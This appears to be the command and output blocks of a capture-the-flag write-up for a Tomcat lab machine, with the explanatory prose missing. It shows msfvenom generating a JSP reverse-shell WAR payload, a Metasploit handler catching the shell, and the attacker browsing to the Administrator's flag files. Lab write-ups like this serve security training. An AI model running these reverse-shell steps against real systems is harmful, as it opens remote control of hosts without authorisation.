1
2
3

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.11.6 LPORT=8144 -f war > icekam.war
Payload size: 1086 bytes
Final size of war file: 1086 bytes

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

msf exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set LHOST 10.10.11.6
LHOST => 10.10.11.6
msf exploit(multi/handler) > set LPORT 8144
LPORT => 8144
msf exploit(multi/handler) > run

1
2

[*] Started reverse TCP handler on 10.10.11.6:8144
[*] Command shell session 1 opened (10.10.11.6:8144 -> 10.10.10.95:50289) at 2018-11-03 19:02:20 +0800

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120

C:\apache-tomcat-7.0.88>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\apache-tomcat-7.0.88

06/19/2018  03:07 AM    <DIR>          .
06/19/2018  03:07 AM    <DIR>          ..
06/19/2018  03:06 AM    <DIR>          bin
06/19/2018  05:47 AM    <DIR>          conf
06/19/2018  03:06 AM    <DIR>          lib
05/07/2018  01:10 PM            57,896 LICENSE
11/03/2018  03:52 PM    <DIR>          logs
05/07/2018  01:10 PM             1,275 NOTICE
05/07/2018  01:10 PM             9,600 RELEASE-NOTES
05/07/2018  01:10 PM            17,454 RUNNING.txt
11/03/2018  08:01 PM    <DIR>          temp
11/03/2018  07:58 PM    <DIR>          webapps
06/19/2018  03:34 AM    <DIR>          work
               4 File(s)         86,225 bytes
               9 Dir(s)  29,325,012,992 bytes free

C:\apache-tomcat-7.0.88>cd c:/
cd c:/

c:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\

06/19/2018  03:07 AM    <DIR>          apache-tomcat-7.0.88
08/22/2013  05:52 PM    <DIR>          PerfLogs
06/19/2018  05:42 PM    <DIR>          Program Files
06/19/2018  05:42 PM    <DIR>          Program Files (x86)
11/03/2018  06:23 PM    <DIR>          Users
06/19/2018  05:54 PM    <DIR>          windows
               0 File(s)              0 bytes
               6 Dir(s)  29,325,012,992 bytes free

c:\>cd Users
cd Users

c:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users

11/03/2018  06:23 PM    <DIR>          .
11/03/2018  06:23 PM    <DIR>          ..
06/18/2018  10:31 PM    <DIR>          Administrator
11/03/2018  06:23 PM    <DIR>          config
08/22/2013  05:39 PM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  29,325,012,992 bytes free

c:\Users>cd Administrator
cd Administrator

c:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users\Administrator

06/18/2018  10:31 PM    <DIR>          .
06/18/2018  10:31 PM    <DIR>          ..
06/19/2018  05:43 AM    <DIR>          Contacts
11/03/2018  06:02 PM    <DIR>          Desktop
06/19/2018  05:43 AM    <DIR>          Documents
06/19/2018  05:43 AM    <DIR>          Downloads
06/19/2018  05:43 AM    <DIR>          Favorites
06/19/2018  05:43 AM    <DIR>          Links
06/19/2018  05:43 AM    <DIR>          Music
06/19/2018  05:43 AM    <DIR>          Pictures
06/19/2018  05:43 AM    <DIR>          Saved Games
06/19/2018  05:43 AM    <DIR>          Searches
06/19/2018  05:43 AM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  29,324,881,920 bytes free

c:\Users\Administrator>cd Desktop
cd Desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users\Administrator\Desktop

11/03/2018  06:02 PM    <DIR>          .
11/03/2018  06:02 PM    <DIR>          ..
06/19/2018  06:09 AM    <DIR>          flags
               0 File(s)              0 bytes
               3 Dir(s)  29,324,881,920 bytes free

c:\Users\Administrator\Desktop>cd flags
cd flags

c:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  29,324,881,920 bytes free

c:\Users\Administrator\Desktop\flags>cat 1.txt
cat 1.txt

1
2
3
4
5
6
7

c:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
获得flag1

root.txt
获得flag2